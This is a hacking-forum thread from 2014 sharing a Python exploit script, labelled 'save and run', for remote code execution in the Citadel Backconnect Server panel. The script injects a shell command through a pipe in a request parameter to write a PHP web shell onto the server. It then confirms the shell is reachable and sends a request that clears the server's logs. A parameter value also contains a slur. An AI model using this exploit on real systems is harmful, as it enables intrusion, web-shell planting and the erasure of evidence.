Sinisterly
Citadel Backconnect Server 1.3.5.1 Remote Code Execution - Printable Version

+- Sinisterly (https://sinister.li)
+-- Forum: Hacking (https://sinister.li/Forum-Hacking)
+--- Forum: Remote Administration & Stress Testing (https://sinister.li/Forum-Remote-Administration-Stress-Testing)
+--- Thread: Citadel Backconnect Server 1.3.5.1 Remote Code Execution (/Thread-Citadel-Backconnect-Server-1-3-5-1-Remote-Code-Execution)



Citadel Backconnect Server 1.3.5.1 Remote Code Execution - joeroot - 07-10-2014

Citadel Backconnect Server 1.3.5.1 Remote Code Execution 2014

save and run exp_ctd.py

PHP Code:
import urllib import urllib2 # Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability # Work only on windows box def request(url, params=None, method='GET'): if method == 'POST': urllib2.urlopen(url, urllib.urlencode(params)).read() elif method == 'GET': if params == None: urllib2.urlopen(url) else: urllib2.urlopen(url + '?' + urllib.urlencode(params)).read() def uploadShell(url, filename, payload): data = { 'b' : 'tapz', 'p1' : 'faggot', 'p2' : 'hacker | echo "' + payload + '" >> ' + filename } request(url + 'test.php', data) def shellExists(url): return urllib.urlopen(url).getcode() == 200 def cleanLogs(url): delete = { 'delete' : '' } request(URL + 'control.php', delete, 'POST') URL = 'http://localhost/citadel/winserv_php_gate/' FILENAME = 'shell.php' PAYLOAD = '<?php phpinfo(); ?>' uploadShell(URL, FILENAME, PAYLOAD) print '***91;~***93; Shell created!' if not shellExists(URL + FILENAME): print '***91;-***93;', FILENAME, 'not found...' else: print '***91;+***93; Go to:', URL + FILENAME cleanLogs(URL) print '***91;~***93; Logs cleaned!' # 9111FFA1CB560CBD 1337day.com ***91;2014-01-02***93; 43A115C3EB64CD0D # source:- http://1337day.com/exploit/21720